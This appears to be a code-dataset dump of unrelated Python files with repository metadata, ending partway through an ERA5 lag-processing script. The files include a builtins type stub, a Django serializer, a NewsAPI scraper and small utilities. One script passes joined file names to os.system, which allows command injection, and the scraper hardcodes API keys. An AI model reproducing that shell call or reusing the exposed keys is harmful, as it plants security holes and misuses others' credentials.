__func: Callable[[_T1, _T2, _T3], _S], __iter1: Iterable[_T1], __iter2: Iterable[_T2], __iter3: Iterable[_T3]
) -> Iterator[_S]: ...
@overload
def map(
__func: Callable[[_T1, _T2, _T3, _T4], _S],
__iter1: Iterable[_T1],
__iter2: Iterable[_T2],
__iter3: Iterable[_T3],
__iter4: Iterable[_T4],
) -> Iterator[_S]: ...
@overload
def map(
__func: Callable[[_T1, _T2, _T3, _T4, _T5], _S],
__iter1: Iterable[_T1],
__iter2: Iterable[_T2],
__iter3: Iterable[_T3],
__iter4: Iterable[_T4],
__iter5: Iterable[_T5],
) -> Iterator[_S]: ...
@overload
def map(
__func: Callable[..., _S],
__iter1: Iterable[Any],
__iter2: Iterable[Any],
__iter3: Iterable[Any],
__iter4: Iterable[Any],
__iter5: Iterable[Any],
__iter6: Iterable[Any],
*iterables: Iterable[Any],
) -> Iterator[_S]: ...
@overload
def max(
__arg1: SupportsLessThanT, __arg2: SupportsLessThanT, *_args: SupportsLessThanT, key: None = ...
) -> SupportsLessThanT: ...
@overload
def max(__arg1: _T, __arg2: _T, *_args: _T, key: Callable[[_T], SupportsLessThanT]) -> _T: ...
@overload
def max(__iterable: Iterable[SupportsLessThanT], *, key: None = ...) -> SupportsLessThanT: ...
@overload
def max(__iterable: Iterable[_T], *, key: Callable[[_T], SupportsLessThanT]) -> _T: ...
@overload
def max(__iterable: Iterable[SupportsLessThanT], *, key: None = ..., default: _T) -> Union[SupportsLessThanT, _T]: ...
@overload
def max(__iterable: Iterable[_T1], *, key: Callable[[_T1], SupportsLessThanT], default: _T2) -> Union[_T1, _T2]: ...
@overload
def min(
__arg1: SupportsLessThanT, __arg2: SupportsLessThanT, *_args: SupportsLessThanT, key: None = ...
) -> SupportsLessThanT: ...
@overload
def min(__arg1: _T, __arg2: _T, *_args: _T, key: Callable[[_T], SupportsLessThanT]) -> _T: ...
@overload
def min(__iterable: Iterable[SupportsLessThanT], *, key: None = ...) -> SupportsLessThanT: ...
@overload
def min(__iterable: Iterable[_T], *, key: Callable[[_T], SupportsLessThanT]) -> _T: ...
@overload
def min(__iterable: Iterable[SupportsLessThanT], *, key: None = ..., default: _T) -> Union[SupportsLessThanT, _T]: ...
@overload
def min(__iterable: Iterable[_T1], *, key: Callable[[_T1], SupportsLessThanT], default: _T2) -> Union[_T1, _T2]: ...
@overload
def next(__i: Iterator[_T]) -> _T: ...
@overload
def next(__i: Iterator[_T], default: _VT) -> Union[_T, _VT]: ...
def oct(__number: Union[int, _SupportsIndex]) -> str: ...
_OpenFile = Union[AnyPath, int]
_Opener = Callable[[str, int], int]
# Text mode: always returns a TextIOWrapper
@overload
def open(
file: _OpenFile,
mode: OpenTextMode = ...,
buffering: int = ...,
encoding: Optional[str] = ...,
errors: Optional[str] = ...,
newline: Optional[str] = ...,
closefd: bool = ...,
opener: Optional[_Opener] = ...,
) -> TextIOWrapper: ...
# Unbuffered binary mode: returns a FileIO
@overload
def open(
file: _OpenFile,
mode: OpenBinaryMode,
buffering: Literal[0],
encoding: None = ...,
errors: None = ...,
newline: None = ...,
closefd: bool = ...,
opener: Optional[_Opener] = ...,
) -> FileIO: ...
# Buffering is on: return BufferedRandom, BufferedReader, or BufferedWriter
@overload
def open(
file: _OpenFile,
mode: OpenBinaryModeUpdating,
buffering: Literal[-1, 1] = ...,
encoding: None = ...,
errors: None = ...,
newline: None = ...,
closefd: bool = ...,
opener: Optional[_Opener] = ...,
) -> BufferedRandom: ...
@overload
def open(
file: _OpenFile,
mode: OpenBinaryModeWriting,
buffering: Literal[-1, 1] = ...,
encoding: None = ...,
errors: None = ...,
newline: None = ...,
closefd: bool = ...,
opener: Optional[_Opener] = ...,
) -> BufferedWriter: ...
@overload
def open(
file: _OpenFile,
mode: OpenBinaryModeReading,
buffering: Literal[-1, 1] = ...,
encoding: None = ...,
errors: None = ...,
newline: None = ...,
closefd: bool = ...,
opener: Optional[_Opener] = ...,
) -> BufferedReader: ...
# Buffering cannot be determined: fall back to BinaryIO
@overload
def open(
file: _OpenFile,
mode: OpenBinaryMode,
buffering: int,
encoding: None = ...,
errors: None = ...,
newline: None = ...,
closefd: bool = ...,
opener: Optional[_Opener] = ...,
) -> BinaryIO: ...
# Fallback if mode is not specified
@overload
def open(
file: _OpenFile,
mode: str,
buffering: int = ...,
encoding: Optional[str] = ...,
errors: Optional[str] = ...,
newline: Optional[str] = ...,
closefd: bool = ...,
opener: Optional[_Opener] = ...,
) -> IO[Any]: ...
def ord(__c: Union[str, bytes]) -> int: ...
def print(
*values: object,
sep: Optional[str] = ...,
end: Optional[str] = ...,
file: Optional[SupportsWrite[str]] = ...,
flush: bool = ...,
) -> None: ...
_E = TypeVar("_E", contravariant=True)
_M = TypeVar("_M", contravariant=True)
class _SupportsPow2(Protocol[_E, _T_co]):
def __pow__(self, __other: _E) -> _T_co: ...
class _SupportsPow3(Protocol[_E, _M, _T_co]):
def __pow__(self, __other: _E, __modulo: _M) -> _T_co: ...
if sys.version_info >= (3, 8):
@overload
def pow(base: int, exp: int, mod: None = ...) -> Any: ... # returns int or float depending on whether exp is non-negative
@overload
def pow(base: int, exp: int, mod: int) -> int: ...
@overload
def pow(base: float, exp: float, mod: None = ...) -> float: ...
@overload
def pow(base: _SupportsPow2[_E, _T_co], exp: _E) -> _T_co: ...
@overload
def pow(base: _SupportsPow3[_E, _M, _T_co], exp: _E, mod: _M) -> _T_co: ...
else:
@overload
def pow(
__base: int, __exp: int, __mod: None = ...
) -> Any: ... # returns int or float depending on whether exp is non-negative
@overload
def pow(__base: int, __exp: int, __mod: int) -> int: ...
@overload
def pow(__base: float, __exp: float, __mod: None = ...) -> float: ...
@overload
def pow(__base: _SupportsPow2[_E, _T_co], __exp: _E) -> _T_co: ...
@overload
def pow(__base: _SupportsPow3[_E, _M, _T_co], __exp: _E, __mod: _M) -> _T_co: ...
def quit(code: object = ...) -> NoReturn: ...
@overload
def reversed(__sequence: Sequence[_T]) -> Iterator[_T]: ...
@overload
def reversed(__sequence: Reversible[_T]) -> Iterator[_T]: ...
def repr(__obj: object) -> str: ...
@overload
def round(number: SupportsRound[Any]) -> int: ...
@overload
def round(number: SupportsRound[Any], ndigits: None) -> int: ...
@overload
def round(number: SupportsRound[_T], ndigits: int) -> _T: ...
def setattr(__obj: Any, __name: str, __value: Any) -> None: ...
@overload
def sorted(__iterable: Iterable[SupportsLessThanT], *, key: None = ..., reverse: bool = ...) -> List[SupportsLessThanT]: ...
@overload
def sorted(__iterable: Iterable[_T], *, key: Callable[[_T], SupportsLessThan], reverse: bool = ...) -> List[_T]: ...
if sys.version_info >= (3, 8):
@overload
def sum(__iterable: Iterable[_T]) -> Union[_T, int]: ...
@overload
def sum(__iterable: Iterable[_T], start: _S) -> Union[_T, _S]: ...
else:
@overload
def sum(__iterable: Iterable[_T]) -> Union[_T, int]: ...
@overload
def sum(__iterable: Iterable[_T], __start: _S) -> Union[_T, _S]: ...
def vars(__object: Any = ...) -> Dict[str, Any]: ...
@overload
def zip(__iter1: Iterable[_T1]) -> Iterator[Tuple[_T1]]: ...
@overload
def zip(__iter1: Iterable[_T1], __iter2: Iterable[_T2]) -> Iterator[Tuple[_T1, _T2]]: ...
@overload
def zip(__iter1: Iterable[_T1], __iter2: Iterable[_T2], __iter3: Iterable[_T3]) -> Iterator[Tuple[_T1, _T2, _T3]]: ...
@overload
def zip(
__iter1: Iterable[_T1], __iter2: Iterable[_T2], __iter3: Iterable[_T3], __iter4: Iterable[_T4]
) -> Iterator[Tuple[_T1, _T2, _T3, _T4]]: ...
@overload
def zip(
__iter1: Iterable[_T1], __iter2: Iterable[_T2], __iter3: Iterable[_T3], __iter4: Iterable[_T4], __iter5: Iterable[_T5]
) -> Iterator[Tuple[_T1, _T2, _T3, _T4, _T5]]: ...
@overload
def zip(
__iter1: Iterable[Any],
__iter2: Iterable[Any],
__iter3: Iterable[Any],
__iter4: Iterable[Any],
__iter5: Iterable[Any],
__iter6: Iterable[Any],
*iterables: Iterable[Any],
) -> Iterator[Tuple[Any, ...]]: ...
def __import__(
name: str,
globals: Optional[Mapping[str, Any]] = ...,
locals: Optional[Mapping[str, Any]] = ...,
fromlist: Sequence[str] = ...,
level: int = ...,
) -> Any: ...
# Actually the type of Ellipsis is <type 'ellipsis'>, but since it's
# not exposed anywhere under that name, we make it private here.
class ellipsis: ...
Ellipsis: ellipsis
class BaseException(object):
args: Tuple[Any, ...]
__cause__: Optional[BaseException]
__context__: Optional[BaseException]
__suppress_context__: bool
__traceback__: Optional[TracebackType]
def __init__(self, *args: object) -> None: ...
def __str__(self) -> str: ...
def __repr__(self) -> str: ...
def with_traceback(self: _TBE, tb: Optional[TracebackType]) -> _TBE: ...
class GeneratorExit(BaseException): ...
class KeyboardInterrupt(BaseException): ...
class SystemExit(BaseException):
code: int
class Exception(BaseException): ...
class StopIteration(Exception):
value: Any
_StandardError = Exception
class OSError(Exception):
errno: int
strerror: str
# filename, filename2 are actually Union[str, bytes, None]
filename: Any
filename2: Any
if sys.platform == "win32":
winerror: int
EnvironmentError = OSError
IOError = OSError
if sys.platform == "win32":
WindowsError = OSError
class ArithmeticError(_StandardError): ...
class AssertionError(_StandardError): ...
class AttributeError(_StandardError): ...
class BufferError(_StandardError): ...
class EOFError(_StandardError): ...
class ImportError(_StandardError):
def __init__(self, *args: object, name: Optional[str] = ..., path: Optional[str] = ...) -> None: ...
name: Optional[str]
path: Optional[str]
msg: str # undocumented
class LookupError(_StandardError): ...
class MemoryError(_StandardError): ...
class NameError(_StandardError): ...
class ReferenceError(_StandardError): ...
class RuntimeError(_StandardError): ...
class StopAsyncIteration(Exception):
value: Any
class SyntaxError(_StandardError):
msg: str
lineno: Optional[int]
offset: Optional[int]
text: Optional[str]
filename: Optional[str]
class SystemError(_StandardError): ...
class TypeError(_StandardError): ...
class ValueError(_StandardError): ...
class FloatingPointError(ArithmeticError): ...
class OverflowError(ArithmeticError): ...
class ZeroDivisionError(ArithmeticError): ...
class ModuleNotFoundError(ImportError): ...
class IndexError(LookupError): ...
class KeyError(LookupError): ...
class UnboundLocalError(NameError): ...
class BlockingIOError(OSError):
characters_written: int
class ChildProcessError(OSError): ...
class ConnectionError(OSError): ...
class BrokenPipeError(ConnectionError): ...
class ConnectionAbortedError(ConnectionError): ...
class ConnectionRefusedError(ConnectionError): ...
class ConnectionResetError(ConnectionError): ...
class FileExistsError(OSError): ...
class FileNotFoundError(OSError): ...
class InterruptedError(OSError): ...
class IsADirectoryError(OSError): ...
class NotADirectoryError(OSError): ...
class PermissionError(OSError): ...
class ProcessLookupError(OSError): ...
class TimeoutError(OSError): ...
class NotImplementedError(RuntimeError): ...
class RecursionError(RuntimeError): ...
class IndentationError(SyntaxError): ...
class TabError(IndentationError): ...
class UnicodeError(ValueError): ...
class UnicodeDecodeError(UnicodeError):
encoding: str
object: bytes
start: int
end: int
reason: str
def __init__(self, __encoding: str, __object: bytes, __start: int, __end: int, __reason: str) -> None: ...
class UnicodeEncodeError(UnicodeError):
encoding: str
object: str
start: int
end: int
reason: str
def __init__(self, __encoding: str, __object: str, __start: int, __end: int, __reason: str) -> None: ...
class UnicodeTranslateError(UnicodeError): ...
class Warning(Exception): ...
class UserWarning(Warning): ...
class DeprecationWarning(Warning): ...
class SyntaxWarning(Warning): ...
class RuntimeWarning(Warning): ...
class FutureWarning(Warning): ...
class PendingDeprecationWarning(Warning): ...
class ImportWarning(Warning): ...
class UnicodeWarning(Warning): ...
class BytesWarning(Warning): ...
class ResourceWarning(Warning): ...
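# --- Illustrative note (an editor's addition, not part of the stub itself) ---
# A minimal sketch of how a type checker would be expected to resolve a few of
# the overloads declared above; the file names and values are hypothetical.
#
#   open("notes.txt")            # -> TextIOWrapper  (text-mode overload)
#   open("blob.bin", "rb")       # -> BufferedReader (buffered binary reading)
#   open("raw.bin", "rb", 0)     # -> FileIO         (unbuffered binary overload)
#   pow(2, 5, 7)                 # -> int            (three-argument int overload)
#   pow(2.0, 0.5)                # -> float          (float overload)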
|
[
"erictr@microsoft.com"
] |
erictr@microsoft.com
|
0dacb01c1f22a603da98647bc57c25c62fc8e595
|
c64ed5cd5f60f1ad5def09fcc39655519cb6f09e
|
/resources/map/items.py
|
5f592669b5ee831bd807ebf077a46bee49a7eeb7
|
[] |
no_license
|
moonblade/WebGame
|
33f0f45047282d7c44e6a4ed8b4a79589f285ee3
|
45761c6e6ca383f991eacb919a9ab105a96cebd1
|
refs/heads/master
| 2022-12-16T06:05:25.307195
| 2021-05-29T14:44:52
| 2021-05-29T14:44:52
| 156,554,764
| 0
| 0
| null | 2022-12-03T21:01:05
| 2018-11-07T14:00:32
|
TypeScript
|
UTF-8
|
Python
| false
| false
| 331
|
py
|
#!/usr/bin/python
import os
outfile = 'items.png'
files = os.popen('ls ./items | sort -n').read()
files = ["items/" + x for x in files.split('\n') if len(x) > 0]
# files = [files.split('\n')[-1]] + files.split('\n')[:-1]
files = ' '.join(files)
# print(files)
command = 'convert ' + files + ' +append ' + outfile
os.system(command)
|
[
"moonblade168@gmail.com"
] |
moonblade168@gmail.com
|
e7e50b7844d4d1c49182d4a961b9980532ff96c3
|
d08c620cf5b9a2f3a55a45895bbd6586a020b74d
|
/foodcartapp/serializers.py
|
406ff0c23e81eb9b589cba585ae33500a6409474
|
[] |
no_license
|
TheEgid/starburger
|
a7b6d9c941852f135d466629e83d3f2ecfce1c96
|
9cfcb2a02fa7adb89c05c967933f4faa3bfb74e8
|
refs/heads/main
| 2023-07-07T18:00:54.962547
| 2021-08-14T08:27:48
| 2021-08-14T08:27:48
| 346,059,152
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 786
|
py
|
from phonenumber_field.serializerfields import PhoneNumberField
from rest_framework.serializers import ModelSerializer
from .models import Product, Order, OrderItem
class ProductSerializer(ModelSerializer):
class Meta:
model = Product
fields = ['id']
class OrderItemSerializer(ModelSerializer):
class Meta:
product = ProductSerializer(many=True)
model = OrderItem
fields = ['id', 'product', 'quantity', 'value']
class OrderSerializer(ModelSerializer):
products = OrderItemSerializer(many=True, write_only=True)
phonenumber = PhoneNumberField()
class Meta:
model = Order
write_only = ['products']
fields = ['id', 'firstname', 'lastname',
'products', 'address', 'phonenumber']
|
[
"egid.f1@gmail.com"
] |
egid.f1@gmail.com
|
c44fa50e6751f303019b95234a6cdbe51e7c54d4
|
c035076460b928695fcabd2fe5b286da45133a9c
|
/WordCount.py
|
6371398c39f8f4b8b57c7af99012f6bbb3bcf89a
|
[] |
no_license
|
ckimani/WordCount
|
2451500ee565fbf01b086e762db01f50088f5ba6
|
b979244251c94815bebec9bf0eb993bb92166557
|
refs/heads/master
| 2021-01-11T19:06:46.434958
| 2017-01-18T08:49:07
| 2017-01-18T08:49:07
| 79,319,324
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 616
|
py
|
def words(str):
    #Takes a single string and returns a dictionary mapping each token to its count.
cnt = dict()
"""
Creating an empty dictionary data type, to hold the string
and the integer (The number of occurences as a pair).
"""
word = str.split()
#The split() function will take each string in the series as a separate entity.
#Analysis of each character in a string.
for char in word:
if char in cnt:
cnt[char] += 1
else:
cnt[char] = 1
return cnt
print( words('olly olly : ¿Qué in come free.'))
#Function call
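# Editor's addition (hedged): the hand-rolled tally above is equivalent to
# collections.Counter over the whitespace-split tokens; this check is only an
# illustration and was not part of the original exercise.
from collections import Counter

sample = 'olly olly in come free'
assert words(sample) == dict(Counter(sample.split()))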
|
[
"noreply@github.com"
] |
noreply@github.com
|
2c665d14bac78537c42bd9cb1e10069b7f4a285c
|
744bbf27f7e6f397e872a1a019d0c8eda46bf1e5
|
/subjects/migrations/0002_auto_20200728_0941.py
|
73128baef5afb2d787efd2b679f5434171cb5e9a
|
[] |
no_license
|
joesky-trojey/SchoolManagement
|
42d5d58dbabd58e0afbae77d922ea87d8c0ee3c6
|
46595fb52f9f4afcaacd042cfdf7903b08249011
|
refs/heads/master
| 2022-11-30T20:14:43.853513
| 2020-08-13T08:37:40
| 2020-08-13T08:37:40
| 287,223,237
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 677
|
py
|
# Generated by Django 3.0.8 on 2020-07-28 09:41
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('subjects', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='subject',
name='shorthand',
field=models.CharField(default=models.CharField(max_length=20, unique=True, verbose_name='Subject'), max_length=10, verbose_name="Subject's shorhand"),
),
migrations.AlterField(
model_name='subject',
name='optionality',
field=models.CharField(max_length=1, verbose_name='Optionality'),
),
]
|
[
"trojey@localhost.localdomain"
] |
trojey@localhost.localdomain
|
d0f805cd5b4c54300491e93aef4f4b816517393e
|
ea872f0a2bcc4270b7089120e3eb2f8dd32a165e
|
/Baxter/build/planning_baxter/catkin_generated/pkg.develspace.context.pc.py
|
e788f2c9fa75bd9400e0e1903a35e10d75c2678c
|
[] |
no_license
|
ZhenYaGuo/Warehouse-Robotic-System
|
2def137478911f499c45276aa3103a0b68ebb8d7
|
47b78d111b387102e29d2596bd5dc7c704f74f8f
|
refs/heads/master
| 2021-08-24T04:12:43.379580
| 2017-12-08T01:48:09
| 2017-12-08T01:48:09
| 113,405,332
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 415
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "planning_baxter"
PROJECT_SPACE_DIR = "/home/cc/ee106a/fa17/class/ee106a-aax/ros_workspaces/project/devel"
PROJECT_VERSION = "0.0.0"
|
[
"31947861+ZhenYaGuo@users.noreply.github.com"
] |
31947861+ZhenYaGuo@users.noreply.github.com
|
d5ac621f8b8dade846b1560e41d0dfdf6b8717fb
|
6833217da57c00bf446dce0d703e8076910ce24f
|
/Coding Tests/Citibank June 2021/digits.py
|
35a583659557fbd4277154e099bd7e4b355550f5
|
[] |
no_license
|
ashjune8/Python-Algorithm-Solutions
|
d301b903263d2787f5f25d182918ced1405cac73
|
04d8453d8ba54b6d7b8ca473d796308ae7f4f6b9
|
refs/heads/master
| 2022-03-01T05:26:22.212625
| 2022-02-19T01:23:53
| 2022-02-19T01:23:53
| 91,991,134
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 364
|
py
|
def solution(N):
# write your code in Python 3.6
stringConverted = str(N)
resultString = ''
if(len(stringConverted) == 1):
return 0
for i in range(len(stringConverted)):
if (i == 0):
resultString += '1'
else:
resultString += '0'
return int(resultString)
print(solution(2))
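# Editor's addition (hedged): spot checks of the behaviour implemented above --
# single-digit inputs collapse to 0, longer inputs become a 1 followed by zeros.
# These cases are illustrative and were not part of the original submission.
assert solution(7) == 0
assert solution(42) == 10
assert solution(1234) == 1000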
|
[
"ashjune8@gmail.com"
] |
ashjune8@gmail.com
|
2a2b92ed730c26b01a26a8190e3a3db8eba1cd6e
|
c524baf320d12b456fa3b2c14127835df3cab567
|
/News_Feed_Generator/source_code/Files/scraping.py
|
524561349c0bf43d31396e5ba1f722cabac1ab0e
|
[] |
no_license
|
kapil123-git/News-Feed-Generator
|
3f7551bfa941bb08d5055c63b4c07931c0cb4797
|
883d68c068bc456c609d1de55e3eb8751102f68a
|
refs/heads/master
| 2023-03-14T22:06:14.762197
| 2021-03-30T17:45:15
| 2021-03-30T17:45:15
| 353,085,294
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,155
|
py
|
import requests
from bs4 import BeautifulSoup
import pandas as pd
from datetime import datetime
from tqdm import tqdm, tqdm_notebook
from functools import reduce
import os
def getSources():
source_url = 'https://newsapi.org/v1/sources?language=en'
response = requests.get(source_url).json()
sources = dict()
for source in response['sources']:
dct=source['id']
sources[dct]=source['category']
return sources
def mapping():
d = {}
response = requests.get('https://newsapi.org/v1/sources?language=en')
response = response.json()
i=0
for s in response['sources']:
lst=[]
lst.append(s['category'])
lst.append(s['name'])
lst.append(s['description'])
d[i]=lst
i+=1
return d
def category(source, m):
try:
return m[source]
except:
return 'NC'
def getDailyNews():
yt=0
surc = getSources()
sources=[]
sources=surc.keys()
#key='38d7369eff324b219b8c24cf22b5f5b0'
key='55feabfcd61c4f3e916b9f7cf24ba048'
url = 'https://newsapi.org/v1/articles?source={0}&sortBy={1}&apiKey={2}'
responses = []
final=[]
bus=0
tec=0
spt=0
ent=0
sci=0
grl=0
ttl_lst=[]
for i, source in tqdm_notebook(enumerate(sources), total=len(sources)):
# if surc[source] =='business':
# key='6dbb708e222a459ebec065c3e2066f77'
# elif surc[source]=='technology':
# key='54e59984b5b24a2d842697cc7c90bbaa'
# elif surc[source]=='science':
# key='b4a1bbaa682341eb8b4abc517f2f8b18'
# elif surc[source]=='sports':
# key='909518b5f3d44f9682eb3a3a3da65b70'
# elif surc[source]=='entertainment':
# key='828126b9d5ce49c397f56a616c0d56a3'
# else:
# key='59f46ecf5a5b4eefae15db1398f4a587'
u = url.format(source, 'top', key)
v= url.format(source, 'latest', key)
response = requests.get(u)
r = response.json()
response = requests.get(v)
s=response.json()
# print(r,"\n\n")
flag=''
fname=''
files=open('123.txt','w')
if r['status']=="error":
return "Done"
try:
for article in r['articles']:
# print("ARTICLES IS:",article,"\n\n")
img=article['urlToImage']
ttl=article['title']
descp=article['description']
# print("title: ",ttl,"\n\ndescp: ",descp)
# print(bus)
# bus+=1
if (ttl is None) or (descp is None):
pass
else:
if ttl not in ttl_lst:
# print("title: ",ttl,"\n\ndescp: ",descp)
f=surc[source]
#print(f)
if f=="business":
fname=os.path.dirname(os.path.abspath(__file__))+"/../../News_data/"+f+"/"+str(bus)+".txt"
bus+=1
flag='b'
elif f=='technology':
fname=os.path.dirname(os.path.abspath(__file__))+"/../../News_data/"+f+"/"+str(tec)+".txt"
tec+=1
flag='t'
elif f=='sports':
fname=os.path.dirname(os.path.abspath(__file__))+"/../../News_data/"+f+"/"+str(spt)+".txt"
spt+=1
flag='sp'
elif f=='entertainment':
fname=os.path.dirname(os.path.abspath(__file__))+"/../../News_data/"+f+"/"+str(ent)+".txt"
ent+=1
flag='e'
elif f=='science':
fname=os.path.dirname(os.path.abspath(__file__))+"/../../News_data/"+f+"/"+str(sci)+".txt"
sci+=1
flag='sc'
else:
fname=os.path.dirname(os.path.abspath(__file__))+"/../../News_data/"+f+"/"+str(grl)+".txt"
grl+=1
flag='g'
files = open(fname,'w')
# print(fname)
# print("before")
art=img+'\n'+ttl+'\n'+descp
ttl_lst.append(ttl)
files.write(art)
files.close()
except Exception as e:
files.close()
# print(fname)
os.remove(fname)
if flag=='b':
bus-=1
elif flag=='t':
tec-=1
elif flag=='sp':
spt-=1
elif flag=='e':
ent-=1
elif flag=='g':
grl-=1
else:
sci-=1
# print(e)
# articles = list(map(lambda r: r['articles'], responses))
# articles = list(reduce(lambda x,y: x+y, articles))
# news = pd.DataFrame(articles)
# news = news.dropna()
# news = news.drop_duplicates()
# news.reset_index(inplace=True, drop=True)
# jink = mapping()
# print(news)
# news['category'] = news['source'].map(lambda s: category(s, d))
# news['scraping_date'] = datetime.now()
# i=2
# print("news")
# jink=dict()
# for u,v in d.items():
# jink[u]=v
# print(jink)
# try:
# aux = pd.read_excel('news.xlsx')
# aux = aux.append(news)
# print("hello..")
# print(aux)
# aux = aux.drop_duplicates('url')
# aux.reset_index(inplace=True, drop=True)
# aux.to_excel('news.xlsx', encoding='utf-8', index=False)
# except:
# news.to_excel('news.xlsx', index=False, encoding='utf-8')
print('Done')
if __name__=='__main__':
getDailyNews()
|
[
"kapilsharmag99@gmail.com"
] |
kapilsharmag99@gmail.com
|
426610fdd1399339d2e3a2442398b51ab5209027
|
c5146f60c3a865050433229ba15c5339c59a9b68
|
/zhaquirks/plaid/__init__.py
|
203efe3bfb31a25162bfb3a165e8d609307592a0
|
[
"Apache-2.0"
] |
permissive
|
Shulyaka/zha-device-handlers
|
331505618a63691a86b83977b43508b0e3142af2
|
84d02be7abde55a6cee80fa155f0cbbc20347c40
|
refs/heads/dev
| 2023-02-22T10:17:09.000060
| 2023-02-04T15:57:17
| 2023-02-04T15:57:17
| 194,286,710
| 1
| 0
|
Apache-2.0
| 2023-02-04T22:59:20
| 2019-06-28T14:25:54
|
Python
|
UTF-8
|
Python
| false
| false
| 72
|
py
|
"""Quirks for Plaid Systems devices."""
PLAID_SYSTEMS = "PLAID SYSTEMS"
|
[
"noreply@github.com"
] |
noreply@github.com
|
77dd188e69c5ed676818bbd7f52b5ac79d253aa4
|
22a366e66890009e225b676ff9415c7cc6d26300
|
/python/src/jobanalysis/skill/process_skills.py
|
5e74ed1866906762b30add6cbc0e961c4fa4269b
|
[] |
no_license
|
smaity8136/jobaly
|
2d0c1cecac09902563ffd1891acee987e2e307f5
|
1788a95877aaf60471db775a3a88a20719ffc586
|
refs/heads/master
| 2022-04-15T03:57:43.770738
| 2015-04-16T22:42:31
| 2015-04-16T22:42:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 637
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 21 16:57:48 2014
@author: dlmu__000
"""
import json
import nltk
def loadFile(fileName):
f = open(fileName, "r")
data = f.read()
sents = json.loads(data)
for sent in sents:
sent[1] = nltk.word_tokenize(sent[1])
        print(sent[1])
return sents
def rule1(sents):
ignoreList = [u'-', u',',u'.',u'or',u'and' ]
pass
def testRule1():
sent = "HTML5, CSS, JavaScript, Sencha ExtJS, JQuery Mobile, and REST."
tokens = nltk.word_tokenize(sent)
    print(tokens)
def main():
testRule1()
if __name__ == "__main__":
main()
|
[
"pkushiqiang@gmail.com"
] |
pkushiqiang@gmail.com
|
3726da4b6e8c640f2c1e4980ff8758f66e31bb14
|
facb8b9155a569b09ba66aefc22564a5bf9cd319
|
/wp2/era5_scripts/02_preprocessing/lag82/504-tideGauge.py
|
f6cdd6a41e7cde5295cbc1bf322d1a52927b4360
|
[] |
no_license
|
moinabyssinia/modeling-global-storm-surges
|
13e69faa8f45a1244a964c5de4e2a5a6c95b2128
|
6e385b2a5f0867df8ceabd155e17ba876779c1bd
|
refs/heads/master
| 2023-06-09T00:40:39.319465
| 2021-06-25T21:00:44
| 2021-06-25T21:00:44
| 229,080,191
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,984
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 31 17:12:23 2020
****************************************************
Load predictors & predictands + predictor importance
****************************************************
@author: Michael Tadesse
"""
#import packages
import os
import pandas as pd
import datetime as dt #used for timedelta
from datetime import datetime
#define directories
dir_in = '/lustre/fs0/home/mtadesse/ereaFiveCombine'
dir_out = '/lustre/fs0/home/mtadesse/eraFiveLag'
def lag():
os.chdir(dir_in)
#get names
tg_list_name = os.listdir()
x = 504
y = 505
for t in range(x, y):
tg_name = tg_list_name[t]
print(tg_name, '\n')
# #check if the file exists
# os.chdir(dir_out)
# if (os.path.isfile(tg_name)):
# print('file already exists')
# continue
#cd to where the actual file is
os.chdir(dir_in)
pred = pd.read_csv(tg_name)
pred.sort_values(by = 'date', inplace=True)
pred.reset_index(inplace = True)
pred.drop('index', axis = 1, inplace = True)
#create a daily time series - date_range
#get only the ymd of the start and end times
start_time = pred['date'][0].split(' ')[0]
end_time = pred['date'].iloc[-1].split(' ')[0]
print(start_time, ' - ', end_time, '\n')
date_range = pd.date_range(start_time, end_time, freq = 'D')
#defining time changing lambda functions
time_str = lambda x: str(x)
time_converted_str = pd.DataFrame(map(time_str, date_range), columns = ['date'])
time_converted_stamp = pd.DataFrame(date_range, columns = ['timestamp'])
"""
first prepare the six time lagging dataframes
then use the merge function to merge the original
predictor with the lagging dataframes
"""
#prepare lagged time series for time only
#note here that since ERA20C has 3hrly data
#the lag_hrs is increased from 6(eraint) to 11 (era20C)
time_lagged = pd.DataFrame()
lag_hrs = [0, 6, 12, 18, 24, 30]
for lag in lag_hrs:
lag_name = 'lag'+str(lag)
lam_delta = lambda x: str(x - dt.timedelta(hours = lag))
lag_new = pd.DataFrame(map(lam_delta, time_converted_stamp['timestamp']), \
columns = [lag_name])
time_lagged = pd.concat([time_lagged, lag_new], axis = 1)
        #dataframe that contains all lagged time series (just time)
time_all = pd.concat([time_converted_str, time_lagged], axis = 1)
pred_lagged = pd.DataFrame()
for ii in range(1,time_all.shape[1]): #to loop through the lagged time series
print(time_all.columns[ii])
#extracting corresponding tag time series
lag_ts = pd.DataFrame(time_all.iloc[:,ii])
lag_ts.columns = ['date']
            #merge the selected lagged time with the predictor on = "date"
pred_new = pd.merge(pred, lag_ts, on = ['date'], how = 'right')
pred_new.drop('Unnamed: 0', axis = 1, inplace = True)
#sometimes nan values go to the bottom of the dataframe
#sort df by date -> reset the index -> remove old index
pred_new.sort_values(by = 'date', inplace=True)
pred_new.reset_index(inplace=True)
pred_new.drop('index', axis = 1, inplace= True)
#concatenate lagged dataframe
if ii == 1:
pred_lagged = pred_new
else:
pred_lagged = pd.concat([pred_lagged, pred_new.iloc[:,1:]], axis = 1)
#cd to saving directory
os.chdir(dir_out)
pred_lagged.to_csv(tg_name)
os.chdir(dir_in)
#run script
lag()
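# Editor's addition (hedged): a minimal, self-contained sketch of the
# lag-and-merge idea used above, on synthetic data. The column names and the
# 6-hour step mirror the script; the values are made up for illustration.
import pandas as pd

ts = pd.date_range('2000-01-01', periods=6, freq='6H')
pred_demo = pd.DataFrame({'date': ts.astype(str), 'surge': range(6)})

# Shift the timestamps back by 6 hours and merge on the string dates: row i of
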